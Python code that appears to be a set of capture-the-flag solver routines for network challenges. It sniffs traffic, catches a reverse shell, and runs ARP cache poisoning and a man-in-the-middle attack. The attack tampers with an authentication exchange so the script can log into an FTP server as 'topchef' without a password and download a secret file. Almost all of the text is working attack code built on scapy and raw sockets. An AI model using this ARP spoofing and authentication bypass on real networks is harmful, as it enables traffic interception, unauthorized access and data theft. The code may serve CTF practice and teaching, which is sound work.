def execute(self, iface, flagpattern="flag\{.*?\}", canceltoken=None): sniffer = capture.Sniffer(iface=iface, filter='udp') analyser = self.AnalysisModule(flagpattern) sniffer.register(analyser) if canceltoken is not None: canceltoken.fork(oncancel=sniffer.stop) sniffer.run() return analyser.flag
def execute(self, iface, flagpattern="flag\{.*?\}", canceltoken=None): sniffer = capture.Sniffer(iface=iface) interceptor = self.ReverseShellCatcherModule(flagpattern) sniffer.register( self.ImpersonatorModule(), interceptor ) if canceltoken is not None: canceltoken.fork(oncancel=sniffer.stop) sniffer.run() return interceptor.flag
def execute(self, runner): sniffer = capture.Sniffer(iface=runner.iface) cachemod = capture.ArpCacheModule() analyser = self.AnalysisModule(runner.flagpattern) sniffer.register( cachemod, analyser, capture.ArpPoisonerModule(cachemod.cache), capture.ForwarderModule(cachemod.cache), ) try: sniffer.start() sniffer.join() finally: sniffer.stop() sniffer.join() return analyser.flag
def execute(self, iface, flagpattern="flag\{.*?\}", canceltoken=None): sniffer = capture.Sniffer(iface=iface) mitm = capture.ArpMitmModule(filter=self.AuthenticationFilter(), iface=iface) sniffer.register( mitm ) with sniffer: # Give the sniffer a chace to get started ftpserver = None authserver = None def tcpprobe(mac, ip, port): return scapy.Ether(src=str(net.ifhwaddr(iface)), dst=mac)/scapy.IP(src=str(net.ifaddr(iface)), dst=ip)/scapy.TCP(sport=random.randint(32000, 50000), dport=port, flags="S") # Scan for the ftp server and the auth server until they are up logging.info("Scanning {:s} for an FTP server and an auth server at tcp port {:d}".format(net.ifcidr(iface), self.authport)) while ftpserver is None or authserver is None: # Use the MITM module's ARP cache to determine what other hosts are alive mitm.poisoner.arping() if not mitm.cache.cache.keys(): logging.debug("ARP cache is empty. Waiting for poisoner to discover hosts") time.sleep(1) continue pkts = [tcpprobe(mac, ip, 21) for ip, mac in mitm.cache.cache.items()] pkts.extend(tcpprobe(mac, ip, self.authport) for ip, mac in mitm.cache.cache.items()) ans, unans = scapy.srp(pkts, iface=iface, timeout=self.scantimeout) for req, resp in ans: if all(layer in resp for layer in (scapy.IP, scapy.TCP)): tcp = resp[scapy.TCP] if tcp.flags == capture.TcpFlags.SYN | capture.TcpFlags.ACK: if tcp.sport == 21: ftpserver = (resp[scapy.IP].src, 21) elif tcp.sport == self.authport: authserver = (resp[scapy.IP].src, self.authport) # Connect to the FTP server and login as 'anonymous' to trigger a succesful authentication exchange logging.info("Loging into the FTP server as 'anonymous'") with socket.socket() as cmdsocket: cmdsocket.connect(ftpserver) cmdsocket.sendall(b'USER anonymous\r\nPASS\r\n') while b'230' not in cmdsocket.recv(4096): pass cmdsocket.shutdown(socket.SHUT_RDWR) # Connect to the FTP server and login as 'topchef'. This will work because of the AuthenticationFilter logging.info("Loging into the FTP server as 'topchef'") with socket.socket() as cmdsocket, socket.socket() as datasocket: cmdsocket.connect(ftpserver) cmdsocket.sendall(b'USER topchef\r\nPASS\r\n') while b'230' not in cmdsocket.recv(4096): pass logging.info("Downloading the secret recipe") # Retrieve the secret recipe and return the flag addr, port = net.ifaddr(iface), random.randint(32000, 50000) datasocket.bind((str(addr), port)) datasocket.listen(1) cmdsocket.sendall('RETR {:s}\r\nPORT {:d},{:d},{:d},{:d},{:d},{:d}\r\n'.format( self.flagpath, int(addr & 0xFF000000) >> 24, int(addr & 0x00FF0000) >> 16, int(addr & 0x0000FF00) >> 8, int(addr & 0x000000FF), (port & 0xFF00) >> 8, (port & 0x00FF) ).encode('utf-8')) while b'150' not in cmdsocket.recv(4096): pass conn, _ = datasocket.accept() data = b'' flag = None while flag is None: data += conn.recv(4096) m = re.search(flagpattern, data.decode('utf-8', "ignore")) if m: flag = m.group(0) cmdsocket.shutdown(socket.SHUT_RDWR) datasocket.shutdown(socket.SHUT_RDWR) return flag